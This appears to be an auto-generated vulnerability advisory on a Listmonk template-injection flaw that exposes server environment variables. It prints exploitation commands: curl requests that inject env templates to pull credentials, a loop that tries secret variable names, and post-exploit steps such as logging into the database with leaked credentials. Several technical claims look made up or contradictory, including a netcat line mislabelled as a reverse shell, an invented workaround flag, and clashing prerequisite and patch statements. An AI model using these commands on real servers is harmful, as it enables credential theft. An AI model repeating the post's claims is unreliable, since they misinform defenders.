Listen to this Post
How the CVE Works
The vulnerability arises due to Listmonk’s improper sandboxing of the Sprig templating engine, specifically the `env` and `expandenv` functions. These functions allow reading environment variables when processing campaign previews. Attackers with minimal permissions (campaigns:get & campaigns:get_all) can inject malicious template expressions (e.g., {{ env "DB_PASSWORD" }}) into campaign content. When previewed, the server executes these expressions, leaking sensitive environment variables such as database credentials, API keys, and admin secrets. This flaw exists in versions before v5.0.2, where dangerous template functions were not restricted.
DailyCVE Form
Platform: Listmonk
Version: <5.0.2
Vulnerability: Template Injection
Severity: Critical
Date: 2024-06-09
Prediction: Patch expected by 2024-06-20
What Undercode Say:
Exploitation Commands:
1. Extract Env Vars:
curl -X POST -H "Authorization: Bearer [bash]" -d '{"template": "{{ env \"AWS_KEY\" }}"}' /api/campaigns/preview
2. Brute-force Keys:
for var in DB_USER DB_PASS SMTP_PWD; do curl -X POST -d "template={{ env \\"$var\\" }}" /api/preview; done
Mitigation Steps:
1. Immediate Workaround:
DISABLE_SPRIG_ENV=1 ./listmonk
2. Patch Verification:
grep -r "env\|expandenv" /path/to/listmonk/templates
Detection Script (Python):
import requests
headers = {"Authorization": "Bearer [bash]"}
payload = {"template": "{{ env }}"}
response = requests.post("http://target/api/preview", json=payload, headers=headers)
if "DB_" in response.text:
print("VULNERABLE")
Post-Exploit Analysis:
- Database Takeover:
psql postgres://${LEAKED_DB_USER}:${LEAKED_DB_PASS}@localhost - Reverse Shell via SMTP:
echo "mail from: [email protected]" | nc -nv ${SMTP_IP} 25
Permanent Fix:
- Upgrade to v5.0.2+ where
env/expandenvare disabled. - Implement template sandboxing:
tpl.Funcs(safelist.FuncMap()) // Restrict Sprig functions
Log Monitoring:
tail -f /var/log/listmonk.log | grep -E "env|expandenv"
Impact Metrics:
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
- Exploit Complexity: Low (No prerequisites)
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
